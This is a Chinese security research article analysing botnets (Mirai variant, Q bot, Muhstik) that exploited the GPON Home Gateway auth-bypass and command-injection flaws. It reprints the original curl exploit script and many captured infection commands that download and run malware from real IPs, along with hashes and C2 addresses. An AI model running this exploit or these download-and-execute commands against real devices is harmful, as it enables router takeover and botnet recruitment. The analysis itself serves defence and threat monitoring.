温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何进行GPON Home Gateway远程命令执行漏洞分析

发布时间:2021-11-11 18:05:28 来源:亿速云 阅读:229 作者:柒染 栏目:安全技术

这篇文章将为大家详细讲解有关如何进行GPON Home Gateway远程命令执行漏洞分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

0x00 前言

一. 漏洞详情

2018/04/30,vpnMentor 公布了 GPON 路由器的高危漏洞:验证绕过漏洞 (CVE-2018-10561) 和命令注入漏洞 (CVE-2018-10562)。由于只需要发送一个请求,就可以在 GPON 路由器 上执行任意命令,所以在上一篇文章《GPON Home Gateway 远程命令执行漏洞分析》,我们给出了僵尸网络的相关预警。

结合 ZoomEye 网络空间搜索引擎以及对漏洞原理的详细研究,我们对 GPON Home Gateway 远程命令执行漏洞被利用情况进行了深入的研究,意外地发现利用该漏洞的僵尸网络是可以被监控的。

短短的四天时间内,这片路由器的战场,竞争、撤退、消亡时时刻刻都在上演,在每一个路由器的背后,每天都有着多个不同的恶意控制者,故事精彩得难以想象。

二. 检测原理

漏洞发现者给出的利用脚本如下:

1  #!/bin/bash3  3  echo 「[+] Sending the Command… 「4  # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices5  curl -k -d 「XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0」 $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null6  echo 「[+] Waiting….」7  sleep 38  echo 「[+] Retrieving the ouput….」9  curl -k $1/diag.html?images/ 2>/dev/null | grep 『diag_result = 『 | sed -e 『s/\\n/\n/g』

该脚本逻辑如下:

步骤 1(行 5):将注入的命令发送至/GponForm/diag_Form 并被执行。

步骤 2(行 9):利用绕过漏洞访问 diag.html 页面获取命令执行的结果。

关键点在第二步:

当我们不使用 grep diag_result 去过滤返回的结果,将会发现部分路由器会将 diag_host 也一并返回。而参数 diag_host 就是步骤 1 中注入的命令。

如何进行GPON Home Gateway远程命令执行漏洞分析

这就意味着,通过 ZoomEye 网络空间搜索引擎,我们可以监控互联网上相关路由器的 diag.html 页面,从而了解僵尸网络的活动情况。

0x01 被利用情况

ZoomEye 网络空间搜索引擎在 2018/05/05、2018/05/07、2018/05/08 进行了三次探测,一共发现了与僵尸网络相关的命令 12 处。

一. 被利用情况总览

如何进行GPON Home Gateway远程命令执行漏洞分析

二. 详细介绍

1. Mirai 变种僵尸网络 THANOS

这是一个在我们研究前撤退、研究时重新归来的僵尸网络
使用的感染命令如下:
编号 1 busybox wget http://104.243.44.250/mips -O /tmp/m 
编号 10 busybox wget http://82.202.166.101/mips -O -

1.1 104.243.44.250 样本

在我们发现相关攻击痕迹时,样本已无法下载。看起来就像始作俑者已经撤退。

如何进行GPON Home Gateway远程命令执行漏洞分析

但是我们仍然从路由器上运行的样本中了解到该僵尸网络的行为:

· 当前进程

如何进行GPON Home Gateway远程命令执行漏洞分析

· 网络连接情况

如何进行GPON Home Gateway远程命令执行漏洞分析

· CNC 82.202.166.101:45,2018/05/05 未连接成功(2018/05/09 发现该 CNC 重新打开)

如何进行GPON Home Gateway远程命令执行漏洞分析

由于该恶意样本拥有生成随机进程名、对外爆破 23 端口等特征,故可能是 Mirai 僵尸网络或其变种。

1.2 82.202.166.101 样本

# sha256sum 82.202.166.101/mips
94717b25e400e142ce14305bf707dfcfe8327986fa187a2c5b32b028898a39ec  82.202.166.101/mips

2018/05/07,我们发现了少量该样本的感染痕迹,通过进一步研究,我们认为该僵尸网络已经回归。由于该样本直接在 1.1 中的 CNC 主机上传播,运行时依旧会生成随机进程名,对外爆破 23 端口,故我们将两者归为同一僵尸网络家族。

新的 CNC

185.232.65.169:8080

新的 CNC 上线包如下

如何进行GPON Home Gateway远程命令执行漏洞分析

根据这个上线包,我们将该僵尸网络称为 Mirai 变种僵尸网络 THANOS

2. Q bot 僵尸网络变种

这是一个持续存在的僵尸网络,在我们三次探测中均有出现。预计感染了大量设备。
使用的感染命令如下:
编号 2 busybox wget http://185.244.25.162/mips -O /tmp/.m 
编号 7 busybox wget http://58.215.144.205/mips -O /tmp/.q
编号 12 busybox wget http://58.215.144.205/mips -O /tmp/adj

   2.1 185.244.25.162 样本

# sha256sum 185.244.25.162/mips
73473c37e5590bd3eb043e33e2f8832989b88f99449582399522c63d4d46251e 185.244.25.162/mips
# file 185.244.25.162/mips
185.244.25.162/mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

该恶意样本属于 MIPS 架构,使用 UPX 加壳。在脱壳对其进行逆向的过程中,我们意外发现了与该样本相关的源码:https://darknetleaks.xyz/archive/botnetfiles/Qbot%20Sources/Hacker%20serverside&clientside/client.c

但该样本和源码依然有很多地方不同:

对外扫描的 IP 段不同,样本中对外扫描的 IP 段如下:

该样本在对外扫描时,只会扫描表格中的这些 IP

如何进行GPON Home Gateway远程命令执行漏洞分析

· kill 别的 bot 的列表

该样本会检测路由器中已有的进程,如果遇到下列可能属于其它僵尸网络的进程,将会进行 kill 操作 (匹配的关键词远比源码中的丰富)

如何进行GPON Home Gateway远程命令执行漏洞分析

该样本的 CNC 为: 185.33.145.92:252, 该 CNC 依旧处于活跃状态

如何进行GPON Home Gateway远程命令执行漏洞分析

需要注意的是

该样本内置了 DDoS 攻击模块,可以根据 CNC 指令发动 TCP、UDP、HTTP 洪水攻击

该样本内置了 netcore backdoor 利用模块,并且可以通过 CNC 开启对外扫描(默认关闭,相关漏洞详情可以参考链接:http://blog.knownsec.com/2015/01/a-brief-analysis-of-netcore-netis-leak-emergency/)

利用脚本如下:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.33.145.92/miggs.sh; chmod 777 miggs.sh; sh miggs.sh; tftp 185.33.145.92 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.33.145.92; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.33.145.92 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf miggs.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

2.2 58.215.144.205 样本(2018/05/07 版本)

# sha256sum 58.215.144.205/mips
41111f0941b323c13ca84caf1e552dc78caac713f4dc1a03fc322c1febcbd6ba  58.215.144.205/mips

该样本的感染逻辑没有太大变化, CNC 与上文相同,为: 185.33.145.92:252,所以我们认为这与上文同属于 Q bot 僵尸网络家族的变种。

2.3 58.215.144.205 样本(2018/05/08 版本)

# sha256sum 0508/58.215.144.205/mips
9590cc3c1e7a32f6221528b526212b2ad87b793b885639580c276243ec60830b 0508/58.215.144.205/mips

2018/05/08,58.215.144.205/mips 更新了相关的样本。通过逆向的结果看,新的样本与之前的逻辑完全不同,恶意控制者更换了控制的程序。

新的样本看起来更像是 Mirai 僵尸网络的新变种,具体的感染细节我们仍在持续跟进中。

该样本的 CNC 为 linuxusaarm.com:443

3. Muhstik 僵尸网络

2018/04/20,360netlab 曝光了一个长期存在的僵尸网络:Muhstik 僵尸网络。在本次漏洞事件中,我们也发现了大量 Muhstik 僵尸网络的身影。

该僵尸网络使用的感染命令如下:

编号 3 wget -qO - http://162.243.211.204/gpon|sh 

编号 4 wget -qO - http://162.243.211.204/aio|sh

编号 5 wget -O /tmp/par http://162.243.211.204/mrt; chmod x /tmp/ping

编号 8 wget -qO - http://54.39.23.28/1sh | sh

编号 9 wget -qO - http://104.54.236.173/gpon | sh

由于该僵尸网络样本众多,多条命令有多次重复感染。故我们通过下图展示各样本和各 IP 的联系:

如何进行GPON Home Gateway远程命令执行漏洞分析

图中红点代表各 IP,灰点代表感染的 bash 脚本,黄点代表各恶意样本,蓝点代表出现的链接,红线代表从 bash 脚本中下载的样本

各感染脚本如下:

# cat 104.54.236.173/gponwget -O /tmp/cron http://162.243.211.204/cron; chmod +x /tmp/cron; chmod 700 /tmp/cron; /tmp/cron &wget -O /tmp/nsshpftp http://162.243.211.204/nsshpftp; chmod +x /tmp/nsshpftp; chmod 700 /tmp/nsshpftp; /tmp/nsshpftp  &# cat 162.243.211.204/gponwget -O /tmp/nsshcron http://162.243.211.204/nsshcron; chmod +x /tmp/nsshcron; chmod 700 /tmp/nsshcron; /tmp/nsshcron&wget -O /tmp/nsshpftp http://162.243.211.204/nsshpftp; chmod +x /tmp/nsshpftp; chmod 700 /tmp/nsshpftp; /tmp/nsshpftp  &# cat 162.243.211.204/gponwget -O /tmp/nsshcron http://162.243.211.204/nsshcron; chmod +x /tmp/nsshcron; chmod 700 /tmp/nsshcron; /tmp/nsshcron&wget -O /tmp/nsshpftp http://162.243.211.204/nsshpftp; chmod +x /tmp/nsshpftp; chmod 700 /tmp/nsshpftp; /tmp/nsshpftp  &root@vultr:~/gpon# cat 54.39.23.28/1shwget -O /tmp/cron http://51.254.221.129/c/cron; chmod +x /tmp/cron; chmod 700 /tmp/cron; /tmp/cron &wget -O /tmp/tfti http://51.254.221.129/c/tfti; chmod +x /tmp/tfti; chmod 700 /tmp/tfti; /tmp/tfti &wget -O /tmp/pftp http://51.254.221.129/c/pftp; chmod +x /tmp/pftp; chmod 700 /tmp/pftp; /tmp/pftp &wget -O /tmp/ntpd http://51.254.221.129/c/ntpd; chmod +x /tmp/ntpd; chmod 700 /tmp/ntpd; /tmp/ntpd  &wget -O /tmp/sshd http://51.254.221.129/c/sshd; chmod +x /tmp/sshd; chmod 700 /tmp/sshd; /tmp/sshd  &wget -O /tmp/bash http://51.254.221.129/c/bash; chmod +x /tmp/bash; chmod 700 /tmp/bash; /tmp/bash  &wget -O /tmp/pty http://51.254.221.129/c/pty; chmod +x /tmp/pty; chmod 700 /tmp/pty; /tmp/pty  &wget -O /tmp/shy http://51.254.221.129/c/shy; chmod +x /tmp/shy; chmod 700 /tmp/shy; /tmp/shy  &wget -O /tmp/nsshtfti http://51.254.221.129/c/nsshtfti; chmod +x /tmp/nsshtfti; chmod 700 /tmp/nsshtfti; /tmp/nsshtfti &wget -O /tmp/nsshcron http://51.254.221.129/c/nsshcron; chmod +x /tmp/nsshcron; chmod 700 /tmp/nsshcron; /tmp/nsshcron  &wget -O /tmp/nsshpftp http://51.254.221.129/c/nsshpftp; chmod +x /tmp/nsshpftp; chmod 700 /tmp/nsshpftp; /tmp/nsshpftp  &fetch -o /sbin/kmpathd http://51.254.221.129/c/fbsd; chmod +x /sbin/kmpathd; /sbin/kmpathd &

各样本 sha256 值如下:

5f2b198701ce619c6af308bcf3cdb2ef36ad2a5a01b9d9b757de1b066070dad7  51.254.221.129/c/bash
f12aa6748543fde5d3b6f882418035634d559fc4ab222d6cfb399fd659b5e34f  51.254.221.129/c/cron
54b951302c8da4f9de837a0309cce034a746345d2f96a821c7fc95aa93752d43  51.254.221.129/c/fbsd
2cfa79ce4059bbc5798f6856cf82af7fce1d161d6ef398c07f01a010ba5299ea  51.254.221.129/c/nsshcron
3ca8c549357d6121b96256715709bccf16a249dcc45bad482f6c8123fc75642f  51.254.221.129/c/nsshpftp
d4fba221b1a706dd3c617e33077d1072b37b2702c3235d342d94abfd032ba5f8  51.254.221.129/c/nsshtfti
e2267edd2b70b5f42a2da942fa47cca98e745f2f2ff8f3bbf7baf8b1331c1a89  51.254.221.129/c/ntpd
cfc82255b7e75da9cd01cffdfd671ccf6fafaa3f705041d383149c1191d8bdff  51.254.221.129/c/pftp
5e8398c89631ea8d9e776ec9bdd6348cb32a77b300ab8b4ead1860a6a1e50be7  51.254.221.129/c/pty
948ef8732346e136320813aade0737540ef498945c1ea14f26a2677e4d64fdee  51.254.221.129/c/shy
5477129edd21ce219e2a8ecf4c0930532c73417702215f5813c437f66c8b0299  51.254.221.129/c/sshd
c937caa3b2e6cbf2cc67d02639751c320c8832047ff3b7ad5783e0fd9c2d7bae  51.254.221.129/c/tfti
3138079caea0baa50978345b58b8d4b05db461b808710146d4e0abb5461c97df  162.243.211.204/aiomips
f12aa6748543fde5d3b6f882418035634d559fc4ab222d6cfb399fd659b5e34f  162.243.211.204/cron
5b71ba608e417fb966ff192578d705a05eab4ff825541d9394c97271196cfd69  162.243.211.204/mrt

CNC

192.99.71.250:9090

4. 未知样本 1

该样本使用的感染命令如下:
编号 6 curl -fsSL http://ztccds.freesfocss.com/test.txt | sh

# sha256sum ztccds.freesfocss.com/zt_arm
24602f1c6d354e3a37d4a2e2dd9cef0098f390e1297c096997cc20da4795f2a2  ztccds.freesfocss.com/zt_arm

该样本会连接 ztccds.freesfocss.com:23364, 样本具体功能仍在研究中。

5. 未知样本 2

该样本使用的感染命令如下:
编号 11 busybox wget http://185.246.152.173/omni -O /tmp/talk
该样本运行的命令为 /tmp/talk gpon

# sha256sum 185.246.152.173/omni
18c23bd57c8247db1de2413ce3ff9e61c5504c43cbadaaefce2fb59f4b3c10a0  185.246.152.173/omni

该样本会连接 185.246.152.173:1000, 但该端口已经关闭 (2018/05/09)。

0x02 受影响主机范围

注:由于仅探测了 diag.html 页面,故在多轮探测中我们只能确定哪些主机被攻击,无法判断攻击者是否攻击成功

一. 探测到的主机均集中在墨西哥

在对探测到的主机进行地域划分时,三轮探测中被攻击的 IP 都位于墨西哥。
对受影响最多的五个国家进行抽样测试,结果如下:

如何进行GPON Home Gateway远程命令执行漏洞分析

该漏洞存在与墨西哥和哈萨克斯坦,但是由于固件不同,只有墨西哥的路由器会返回 diag_host,所以我们仅监测到墨西哥的路由器受影响情况。

如何进行GPON Home Gateway远程命令执行漏洞分析

由于墨西哥的设备占据了全球设备的一半以上,我们认为相关数据依旧可以反应僵尸网络的实际情况。

二. 受攻击的路由器执行的命令情况

由于 2018/05/05 第一轮探测中只统计了存在/tmp 字段的 diag_host 的内容,所以第一轮探测的数据具有一定的局限性。

如何进行GPON Home Gateway远程命令执行漏洞分析

可以很明显看出:

确认被攻击的路由器数量在不断增加

各僵尸网络活动频繁,2018/05/07 Muhstik 僵尸网络发动大量攻击,而 2018/05/08 就变成了 Q bot 僵尸网络变种。僵尸网络之间的竞争可见一斑。

0x03 结语

近年来,僵尸网络逐渐盯上攻击简单但危害巨大的物联网漏洞。从去年的 GoAhead 到今年的 GPON 事件,无不在提醒我们物联网安全的重要性。能结合 ZoomEye 网络空间搜索引擎了解到 GPON 事件背后活跃的僵尸网络动态,对我们来说就是一种收获。

关于如何进行GPON Home Gateway远程命令执行漏洞分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI